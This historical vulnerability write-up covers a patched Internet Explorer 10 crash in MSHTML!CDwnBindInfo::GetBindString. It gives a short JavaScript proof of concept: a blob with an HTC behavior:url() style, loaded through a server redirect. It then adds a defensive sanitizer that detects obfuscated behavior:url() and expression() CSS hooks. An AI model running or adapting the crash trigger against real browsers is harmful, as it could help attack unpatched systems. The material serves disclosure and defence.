I found that creating a blob with HTML content that referenced an HTC behavior (style="behavior:url(1)") and then navigating to it via a server redirect caused a crash in MSHTML!CDwnBindInfo::GetBindString. Credits for the blob research direction go to Gareth Heyes and Mario Heiderich.

var bb = new MSBlobBuilder();               // IE10's vendor-prefixed BlobBuilder.
bb.append('<div style="behavior:url(1)">'); // HTML referencing an HTC behavior; rendering this crashes the browser.
var blob = bb.getBlob("text/html");
var blobUrl = window.URL.createObjectURL(blob);
location.href = "redirect.aspx?URL=" + blobUrl; // Server-side redirect to the blob URL; the crash occurs when the redirected page renders.

When the browser rendered the blob and tried to load the HTC behavior URL, CDwnBindInfo::GetBindString dereferenced a null pointer at offset 0x34. The fault was rated UNKNOWN exploitability with the note that data from the faulting address controls branch selection.
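A mitigation-side counterpart, added here as an example rather than code from the original post: a pre-check that refuses untrusted HTML carrying the legacy IE behavior:url() (or expression()) hook before it is handed to createObjectURL. Function names, the fake environment parameter and the sample inputs are constructed for this example.

```javascript
// Decode common obfuscations before matching: HTML entities inside the
// attribute, CSS comments, and CSS backslash escapes (e.g. "\62 ehavior").
function normalizeStyle(text) {
  return text
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/\\([0-9a-f]{1,6})\s?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\(.)/g, "$1")
    .replace(/[\u0000-\u001f]/g, "")
    .toLowerCase();
}

// Collects CSS from style="" attributes and <style> blocks and returns every
// legacy-IE hook found (whitespace collapsed); an empty list means the check passed.
function findLegacyIeCssHooks(html) {
  const candidates = [];
  for (const m of html.matchAll(/style\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi)) {
    candidates.push(m[1] ?? m[2] ?? m[3]);
  }
  for (const m of html.matchAll(/<style\b[^>]*>([\s\S]*?)<\/style\s*>/gi)) {
    candidates.push(m[1]);
  }
  // behavior:url( is the HTC hook from the crash above; -ms-behavior is the
  // prefixed form later IE versions accepted; expression( is the other IE-only CSS hook.
  const hooks = /(?:-ms-)?behavior\s*:\s*url\s*\(|expression\s*\(/g;
  const findings = [];
  for (const css of candidates) {
    for (const hit of normalizeStyle(css).matchAll(hooks)) {
      findings.push(hit[0].replace(/\s+/g, ""));
    }
  }
  return findings;
}

// Only builds the blob URL once the HTML passes the check. `env` defaults to
// the page's own globals (standard Blob / URL.createObjectURL) and is a
// constructed parameter so the function can be exercised without a browser.
function safeHtmlBlobUrl(html, env = globalThis) {
  const found = findLegacyIeCssHooks(html);
  if (found.length) throw new Error("rejected legacy IE CSS hook: " + found.join(", "));
  return env.URL.createObjectURL(new env.Blob([html], { type: "text/html" }));
}
```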

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.